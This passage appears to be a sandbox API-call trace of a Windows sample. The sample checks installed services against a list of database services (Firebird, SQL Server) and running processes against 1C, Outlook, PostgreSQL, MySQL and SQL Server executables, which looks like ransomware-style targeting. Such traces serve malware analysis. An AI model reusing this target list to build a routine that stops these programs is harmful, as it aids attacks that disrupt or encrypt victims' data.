	[0153.243] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0153.243] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0153.243] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0153.243] lstrlenW (lpString="AudioSrv") returned 8
	[0153.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0153.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0153.244] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0153.244] lstrlenW (lpString="BFE") returned 3
	[0153.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0153.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0153.244] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0153.244] lstrlenW (lpString="CryptSvc") returned 8
	[0153.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0153.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0153.244] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0153.244] lstrlenW (lpString="CscService") returned 10
	[0153.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0153.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0153.244] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0153.244] lstrlenW (lpString="DcomLaunch") returned 10
	[0153.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0153.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0153.244] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0153.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0153.244] lstrlenW (lpString="Dhcp") returned 4
	[0153.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0153.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0153.245] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0153.245] lstrlenW (lpString="Dnscache") returned 8
	[0153.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0153.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0153.245] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0153.245] lstrlenW (lpString="DPS") returned 3
	[0153.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0153.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0153.245] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0153.245] lstrlenW (lpString="eventlog") returned 8
	[0153.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0153.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0153.245] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0153.245] lstrlenW (lpString="EventSystem") returned 11
	[0153.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0153.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0153.245] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0153.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0153.245] lstrlenW (lpString="gpsvc") returned 5
	[0153.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0153.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0153.246] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0153.246] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0153.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0153.246] lstrlenW (lpString="iphlpsvc") returned 8
	[0153.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0153.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0153.246] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0153.246] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0153.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0153.246] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0153.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0153.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0153.246] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0153.246] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0153.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0153.246] lstrlenW (lpString="lmhosts") returned 7
	[0153.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0153.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0153.246] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0153.246] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0153.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0153.246] lstrlenW (lpString="MMCSS") returned 5
	[0153.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0153.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0153.247] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0153.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0153.247] lstrlenW (lpString="MpsSvc") returned 6
	[0153.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0153.247] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0153.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0153.247] lstrlenW (lpString="NlaSvc") returned 6
	[0153.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0153.247] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0153.247] lstrlenW (lpString="nsi") returned 3
	[0153.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0153.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0153.247] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0153.247] lstrlenW (lpString="PcaSvc") returned 6
	[0153.247] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0153.247] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0153.247] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0153.248] lstrlenW (lpString="PlugPlay") returned 8
	[0153.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0153.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0153.248] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0153.248] lstrlenW (lpString="Power") returned 5
	[0153.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0153.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0153.248] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0153.248] lstrlenW (lpString="ProfSvc") returned 7
	[0153.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0153.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0153.248] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0153.248] lstrlenW (lpString="RpcEptMapper") returned 12
	[0153.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0153.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0153.248] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0153.248] lstrlenW (lpString="RpcSs") returned 5
	[0153.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0153.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0153.248] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0153.249] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0153.249] lstrlenW (lpString="SamSs") returned 5
	[0153.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0153.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0153.249] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0153.249] lstrlenW (lpString="Schedule") returned 8
	[0153.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0153.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0153.249] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0153.249] lstrlenW (lpString="SENS") returned 4
	[0153.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0153.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0153.249] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0153.249] lstrlenW (lpString="ShellHWDetection") returned 16
	[0153.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0153.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0153.249] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0153.249] lstrlenW (lpString="Spooler") returned 7
	[0153.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0153.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0153.249] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0153.250] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0153.250] lstrlenW (lpString="SysMain") returned 7
	[0153.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0153.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0153.250] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0153.250] lstrlenW (lpString="Themes") returned 6
	[0153.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0153.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0153.250] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0153.250] lstrlenW (lpString="TrkWks") returned 6
	[0153.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0153.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0153.250] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0153.250] lstrlenW (lpString="UxSms") returned 5
	[0153.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0153.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0153.250] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0153.250] lstrlenW (lpString="Winmgmt") returned 7
	[0153.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0153.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0153.250] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0153.251] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0153.251] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0153.251] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0153.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d4
	[0153.253] Process32FirstW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0153.253] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0153.254] lstrlenW (lpString="System") returned 6
	[0153.254] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0153.254] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0153.254] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0153.254] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0153.254] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0153.254] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0153.254] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0153.254] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0153.254] lstrlenW (lpString="smss.exe") returned 8
	[0153.254] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0153.254] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0153.254] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0153.254] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0153.254] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0153.254] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0153.254] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0153.255] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0153.255] lstrlenW (lpString="csrss.exe") returned 9
	[0153.255] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0153.255] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0153.255] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0153.255] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0153.255] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0153.255] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0153.255] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0153.255] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0153.255] lstrlenW (lpString="wininit.exe") returned 11
	[0153.255] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0153.255] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0153.255] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0153.256] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0153.256] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0153.256] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0153.256] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0153.256] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0153.256] lstrlenW (lpString="csrss.exe") returned 9
	[0153.256] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0153.256] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0153.256] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0153.256] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0153.256] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0153.256] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0153.256] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0153.256] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0153.256] lstrlenW (lpString="winlogon.exe") returned 12
	[0153.256] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0153.257] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0153.257] lstrlenW (lpString="services.exe") returned 12
	[0153.257] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0153.257] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0153.257] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0153.258] lstrlenW (lpString="lsass.exe") returned 9
	[0153.258] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0153.258] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0153.258] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0153.258] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0153.258] lstrlenW (lpString="lsm.exe") returned 7
	[0153.258] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0153.258] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0153.258] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0153.258] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0153.258] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.259] lstrlenW (lpString="svchost.exe") returned 11
	[0153.259] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
